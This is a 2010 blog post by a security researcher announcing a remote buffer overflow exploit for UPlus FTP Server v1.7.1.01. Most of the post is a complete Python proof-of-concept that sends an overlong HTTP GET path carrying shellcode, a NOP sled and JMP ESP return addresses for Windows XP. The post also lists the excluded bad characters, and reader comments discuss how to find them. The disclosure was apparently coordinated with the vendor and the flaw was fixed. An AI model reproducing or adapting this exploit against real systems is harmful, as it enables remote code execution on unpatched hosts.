Thursday, July 29, 2010

UPlus FTP Server v1.7.1.0.1 remote buffer overflow exploit published

Hi All,

Posted another remote code execution exploit on Exploit-db an hour back. It is published now :-)

###
#!/usr/bin/python
import socket,sys,base64
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
    Discovered by : Karn Ganeshen                         
    Author : Karn Ganeshen / corelanc0d3r
                                                    
    KarnGaneshen [aT] gmail [d0t] com                         
    http://ipositivesecurity.blogspot.com
                                                
    Greetz out to:  corelanc0d3r
                    http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
if len(sys.argv) != 5:
    print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
auth = base64.b64encode(user+":"+pwd)
buf="A"*1963
buf+="\x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"
"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"
"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"
"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"
"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"
"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"
"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"
"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"
"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"
"\x27\x0c\xbc\x7f\x38")
buf+="\x90"*15
#[ XP SP2 ] -> "\x78\x16\xF3\x77"    #0x77F31678  JMP ESP
buf+="\x78\x16\xF3\x77"
#[ XP SP3 ] -> "\x3F\x71\x49\x7E"   #0x7E49713F  JMP ESP
#buf+="\x3F\x71\x49\x7E"
buf+="\x90"*30
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x50\xc3"                 #PUSH EAX + RET
print "[+] Launching exploit against " + target + "..."
head = "GET /list.html?path="+buf+" HTTP/1.1 \r\n"
head += "Host: \r\n"
head += "Authorization: Basic "+auth+"\r\n"
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "\r\n")
    print "[!] Payload sent..."
    s.close()
except:
    print "[x] Error!"
I actually missed out specifying the bad chars which I excluded while generating the payload. So here they are:
\x0a \x20 \x25 \x26

I should be able to post a video showing how this exploit was prepared & tested. Watch out on this space!

Shoutz to corelanc0d3r! :)

You may also check it out here:

Update: Advisory published on Secunia -> http://secunia.com/advisories/40771

Best Regards.

2 comments:

  1. hi
    thanks for this exploit but I have some questions about bad char :)

    the bad Depends on what OS or the program
    and how I can found it

    best wishes

    ReplyDelete
  2. Hi,

    Identifying bad chars is an important aspect when writing an exploit. There are certain chars which are always considered to be bad chars on any OS or app. For e.g. \x00 -> null byte which would stop the execution flow.

    Also, there are chars specific to app which may break our shellcode / exploit. These application specific bad chars need to be identified & excluded for each app.

    Peter has written a nice tutorial on this subject ->

    http://www.corelan.be:8800/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/

    Please go through it and feel free to ask questions.

    Best Regards.

    ReplyDelete

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.